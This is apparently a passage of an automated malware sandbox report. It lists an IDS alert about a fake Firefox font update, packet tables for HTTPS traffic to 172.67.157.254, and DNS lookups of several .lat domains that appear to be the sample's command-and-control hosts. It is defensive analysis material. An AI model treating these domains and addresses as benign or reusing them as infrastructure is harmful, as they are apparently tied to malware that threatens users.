                                                                                                                                                                                                                                  2024-12-26T13:09:50.190424+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549747172.67.157.254443TCP

                                                                                                                                                                                                                                  Network Port Distribution

                                                                                                                                                                                                                                  TCP Packets

                                                                                                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:23.741478920 CET49704443192.168.2.5104.102.49.254
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:23.741528034 CET44349704104.102.49.254192.168.2.5
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:23.741585970 CET49704443192.168.2.5104.102.49.254
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:23.743663073 CET49704443192.168.2.5104.102.49.254
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:23.743675947 CET44349704104.102.49.254192.168.2.5
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:25.225616932 CET44349704104.102.49.254192.168.2.5
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:25.225745916 CET49704443192.168.2.5104.102.49.254
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:25.230566978 CET49704443192.168.2.5104.102.49.254
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:25.230577946 CET44349704104.102.49.254192.168.2.5
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:25.230952024 CET44349704104.102.49.254192.168.2.5
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:25.284080029 CET49704443192.168.2.5104.102.49.254
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:25.318907976 CET49704443192.168.2.5104.102.49.254
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:25.363338947 CET44349704104.102.49.254192.168.2.5
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:26.082921982 CET44349704104.102.49.254192.168.2.5
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:26.082983017 CET44349704104.102.49.254192.168.2.5
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:26.082994938 CET49704443192.168.2.5104.102.49.254
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:26.083003998 CET44349704104.102.49.254192.168.2.5
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:26.083049059 CET44349704104.102.49.254192.168.2.5
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:26.083070993 CET49704443192.168.2.5104.102.49.254
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:26.083070993 CET49704443192.168.2.5104.102.49.254
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:26.083076954 CET44349704104.102.49.254192.168.2.5
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:26.083096981 CET44349704104.102.49.254192.168.2.5
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:26.083118916 CET49704443192.168.2.5104.102.49.254
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:26.083127975 CET44349704104.102.49.254192.168.2.5
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:26.083146095 CET49704443192.168.2.5104.102.49.254
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:26.127811909 CET49704443192.168.2.5104.102.49.254
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:26.302072048 CET44349704104.102.49.254192.168.2.5
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:26.302099943 CET44349704104.102.49.254192.168.2.5
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:26.302161932 CET44349704104.102.49.254192.168.2.5
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:26.302177906 CET49704443192.168.2.5104.102.49.254
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:26.302218914 CET44349704104.102.49.254192.168.2.5
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:26.302234888 CET49704443192.168.2.5104.102.49.254
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:26.302263021 CET49704443192.168.2.5104.102.49.254
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:26.309663057 CET44349704104.102.49.254192.168.2.5
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:26.309729099 CET49704443192.168.2.5104.102.49.254
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:26.309765100 CET44349704104.102.49.254192.168.2.5
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:26.309806108 CET49704443192.168.2.5104.102.49.254
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:26.309823036 CET44349704104.102.49.254192.168.2.5
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:26.309957027 CET44349704104.102.49.254192.168.2.5
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:26.310003042 CET49704443192.168.2.5104.102.49.254
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:26.376266956 CET49704443192.168.2.5104.102.49.254
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:26.376300097 CET44349704104.102.49.254192.168.2.5
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:26.376316071 CET49704443192.168.2.5104.102.49.254
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:26.376322031 CET44349704104.102.49.254192.168.2.5
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:26.542299032 CET49705443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:26.542355061 CET44349705172.67.157.254192.168.2.5
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:26.542428017 CET49705443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:26.542743921 CET49705443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:26.542757988 CET44349705172.67.157.254192.168.2.5
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:27.876523972 CET44349705172.67.157.254192.168.2.5
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:27.876647949 CET49705443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:27.879828930 CET49705443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:27.879846096 CET44349705172.67.157.254192.168.2.5
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:27.880166054 CET44349705172.67.157.254192.168.2.5
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:27.881369114 CET49705443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:27.881398916 CET49705443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:27.881455898 CET44349705172.67.157.254192.168.2.5
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:28.651554108 CET44349705172.67.157.254192.168.2.5
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:28.651654005 CET44349705172.67.157.254192.168.2.5
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:28.651710987 CET49705443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:28.652313948 CET49705443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:28.652334929 CET44349705172.67.157.254192.168.2.5
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:28.652348042 CET49705443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:28.652354002 CET44349705172.67.157.254192.168.2.5
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:28.685570002 CET49706443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:28.685614109 CET44349706172.67.157.254192.168.2.5
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:28.685789108 CET49706443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:28.685975075 CET49706443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:28.685988903 CET44349706172.67.157.254192.168.2.5
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:29.989038944 CET44349706172.67.157.254192.168.2.5
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:29.989305973 CET49706443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:29.990609884 CET49706443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:29.990633965 CET44349706172.67.157.254192.168.2.5
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:29.990869045 CET44349706172.67.157.254192.168.2.5
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:29.992322922 CET49706443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:29.992350101 CET49706443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:29.992400885 CET44349706172.67.157.254192.168.2.5
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:30.761881113 CET44349706172.67.157.254192.168.2.5
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:30.761945009 CET44349706172.67.157.254192.168.2.5
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:30.761980057 CET44349706172.67.157.254192.168.2.5
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:30.762022018 CET44349706172.67.157.254192.168.2.5
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:30.762027025 CET49706443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:30.762046099 CET44349706172.67.157.254192.168.2.5
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:30.762067080 CET49706443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:30.762111902 CET44349706172.67.157.254192.168.2.5
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:30.762155056 CET49706443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:30.762162924 CET44349706172.67.157.254192.168.2.5
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:30.770139933 CET44349706172.67.157.254192.168.2.5
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:30.770209074 CET49706443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:30.770217896 CET44349706172.67.157.254192.168.2.5
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:30.778511047 CET44349706172.67.157.254192.168.2.5
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:30.778578043 CET49706443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:30.778587103 CET44349706172.67.157.254192.168.2.5
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:30.830944061 CET49706443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:30.830965996 CET44349706172.67.157.254192.168.2.5
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:30.878014088 CET49706443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:30.972184896 CET44349706172.67.157.254192.168.2.5
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:30.976078033 CET44349706172.67.157.254192.168.2.5
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:30.976120949 CET44349706172.67.157.254192.168.2.5
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:30.976156950 CET49706443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:30.976171017 CET44349706172.67.157.254192.168.2.5
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:30.976221085 CET49706443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:30.976227999 CET44349706172.67.157.254192.168.2.5
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:30.976246119 CET44349706172.67.157.254192.168.2.5
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:30.976294994 CET49706443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:30.976429939 CET49706443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:30.976444006 CET44349706172.67.157.254192.168.2.5
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:30.976459980 CET49706443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:30.976469040 CET44349706172.67.157.254192.168.2.5
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:31.383409977 CET49707443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:31.383446932 CET44349707172.67.157.254192.168.2.5
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:31.383516073 CET49707443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:31.385226965 CET49707443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:31.385238886 CET44349707172.67.157.254192.168.2.5
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:32.689419985 CET44349707172.67.157.254192.168.2.5
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:32.689522028 CET49707443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:32.691363096 CET49707443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:32.691375971 CET44349707172.67.157.254192.168.2.5
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:32.691641092 CET44349707172.67.157.254192.168.2.5
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:32.692894936 CET49707443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:32.693114996 CET49707443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:32.693140984 CET44349707172.67.157.254192.168.2.5
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:36.086649895 CET44349707172.67.157.254192.168.2.5
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:36.086925030 CET44349707172.67.157.254192.168.2.5
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:36.086994886 CET49707443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:36.087167025 CET49707443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:36.087187052 CET44349707172.67.157.254192.168.2.5
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:36.237565994 CET49709443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:36.237694025 CET44349709172.67.157.254192.168.2.5
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:36.237782955 CET49709443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:36.238678932 CET49709443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:36.238715887 CET44349709172.67.157.254192.168.2.5
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:37.545398951 CET44349709172.67.157.254192.168.2.5
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:37.545483112 CET49709443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:37.546870947 CET49709443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:37.546890974 CET44349709172.67.157.254192.168.2.5
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:37.547157049 CET44349709172.67.157.254192.168.2.5
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:37.548492908 CET49709443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:37.548634052 CET49709443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:37.548690081 CET44349709172.67.157.254192.168.2.5
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:37.548809052 CET49709443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:37.548821926 CET44349709172.67.157.254192.168.2.5
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:38.533287048 CET44349709172.67.157.254192.168.2.5
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:38.533416986 CET44349709172.67.157.254192.168.2.5
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:38.533487082 CET49709443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:38.533560991 CET49709443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:38.533581018 CET44349709172.67.157.254192.168.2.5
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:39.265558958 CET49717443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:39.265598059 CET44349717172.67.157.254192.168.2.5
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:39.265662909 CET49717443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:39.266143084 CET49717443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:39.266156912 CET44349717172.67.157.254192.168.2.5
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:40.569298983 CET44349717172.67.157.254192.168.2.5
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:40.569369078 CET49717443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:40.577159882 CET49717443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:40.577178001 CET44349717172.67.157.254192.168.2.5
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:40.577441931 CET44349717172.67.157.254192.168.2.5
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:40.585998058 CET49717443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:40.586322069 CET49717443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:40.586359024 CET44349717172.67.157.254192.168.2.5
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:40.586425066 CET49717443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:40.586431980 CET44349717172.67.157.254192.168.2.5
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:41.587574959 CET44349717172.67.157.254192.168.2.5
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:41.587671995 CET44349717172.67.157.254192.168.2.5
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:41.587749004 CET49717443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:41.769406080 CET49717443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:41.769429922 CET44349717172.67.157.254192.168.2.5
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:42.287062883 CET49729443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:42.287117004 CET44349729172.67.157.254192.168.2.5
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:42.287414074 CET49729443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:42.287992001 CET49729443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:42.288007975 CET44349729172.67.157.254192.168.2.5
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:43.591942072 CET44349729172.67.157.254192.168.2.5
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:43.592012882 CET49729443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:43.594187975 CET49729443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:43.594198942 CET44349729172.67.157.254192.168.2.5
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:43.594435930 CET44349729172.67.157.254192.168.2.5
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:43.596024990 CET49729443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:43.596024990 CET49729443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:43.596055984 CET44349729172.67.157.254192.168.2.5
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:44.390707970 CET44349729172.67.157.254192.168.2.5
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:44.390806913 CET44349729172.67.157.254192.168.2.5
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:44.391001940 CET49729443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:44.391092062 CET49729443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:44.391108990 CET44349729172.67.157.254192.168.2.5
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:44.891448021 CET49736443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:44.891499043 CET44349736172.67.157.254192.168.2.5
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:44.891644955 CET49736443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:44.891989946 CET49736443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:44.892000914 CET44349736172.67.157.254192.168.2.5
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:46.195467949 CET44349736172.67.157.254192.168.2.5
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:46.195558071 CET49736443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:46.196965933 CET49736443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:46.196974993 CET44349736172.67.157.254192.168.2.5
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:46.197210073 CET44349736172.67.157.254192.168.2.5
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:46.205389977 CET49736443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:46.206204891 CET49736443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:46.206232071 CET44349736172.67.157.254192.168.2.5
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:46.206351995 CET49736443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:46.206370115 CET44349736172.67.157.254192.168.2.5
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:46.206479073 CET49736443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:46.206516981 CET44349736172.67.157.254192.168.2.5
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:46.206640959 CET49736443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:46.206655979 CET44349736172.67.157.254192.168.2.5
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:46.206792116 CET49736443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:46.206809044 CET44349736172.67.157.254192.168.2.5
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:46.206954002 CET49736443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:46.206971884 CET44349736172.67.157.254192.168.2.5
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:46.206995010 CET49736443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:46.207110882 CET49736443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:46.207139969 CET49736443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:46.247328043 CET44349736172.67.157.254192.168.2.5
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:46.247525930 CET49736443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:46.247591972 CET49736443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:46.247612953 CET49736443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:46.295351028 CET44349736172.67.157.254192.168.2.5
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:46.295500994 CET49736443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:46.295545101 CET49736443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:46.295581102 CET49736443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:46.339339018 CET44349736172.67.157.254192.168.2.5
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:46.339513063 CET49736443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:46.377907991 CET49736443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:46.377927065 CET44349736172.67.157.254192.168.2.5
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:46.568150043 CET44349736172.67.157.254192.168.2.5
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:49.907645941 CET44349736172.67.157.254192.168.2.5
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:49.907762051 CET44349736172.67.157.254192.168.2.5
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:49.907815933 CET49736443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:49.924593925 CET49736443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:49.924607038 CET44349736172.67.157.254192.168.2.5
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:49.951822042 CET49747443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:49.951849937 CET44349747172.67.157.254192.168.2.5
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:49.951913118 CET49747443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:49.952658892 CET49747443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:49.952672005 CET44349747172.67.157.254192.168.2.5
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:50.190423965 CET49747443192.168.2.5172.67.157.254

                                                                                                                                                                                                                                  UDP Packets

                                                                                                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:22.212302923 CET5259353192.168.2.51.1.1.1
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:22.350723028 CET53525931.1.1.1192.168.2.5
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:22.355457067 CET6212253192.168.2.51.1.1.1
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:22.493642092 CET53621221.1.1.1192.168.2.5
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:22.593627930 CET4939253192.168.2.51.1.1.1
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:22.731213093 CET53493921.1.1.1192.168.2.5
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:22.732990026 CET6310153192.168.2.51.1.1.1
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:22.870779991 CET53631011.1.1.1192.168.2.5
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:22.875255108 CET6215553192.168.2.51.1.1.1
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:23.013509989 CET53621551.1.1.1192.168.2.5
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:23.026057959 CET5570153192.168.2.51.1.1.1
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:23.164361000 CET53557011.1.1.1192.168.2.5
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:23.166539907 CET5081453192.168.2.51.1.1.1
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:23.306277037 CET53508141.1.1.1192.168.2.5
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:23.312824965 CET5675653192.168.2.51.1.1.1
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:23.450612068 CET53567561.1.1.1192.168.2.5
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:23.453182936 CET5730953192.168.2.51.1.1.1
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:23.592289925 CET53573091.1.1.1192.168.2.5
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:23.594928026 CET5360853192.168.2.51.1.1.1
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:23.733939886 CET53536081.1.1.1192.168.2.5
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:26.398699999 CET5164853192.168.2.51.1.1.1
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:26.541241884 CET53516481.1.1.1192.168.2.5

                                                                                                                                                                                                                                  DNS Queries

                                                                                                                                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:22.212302923 CET192.168.2.51.1.1.10x8e7eStandard query (0)observerfry.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:22.355457067 CET192.168.2.51.1.1.10x3a65Standard query (0)wordyfindy.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:22.593627930 CET192.168.2.51.1.1.10x8f0fStandard query (0)slipperyloo.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:22.732990026 CET192.168.2.51.1.1.10xafbeStandard query (0)manyrestro.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:22.875255108 CET192.168.2.51.1.1.10x3600Standard query (0)shapestickyr.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:23.026057959 CET192.168.2.51.1.1.10x69eeStandard query (0)talkynicer.latA (IP address)IN (0x0001)false
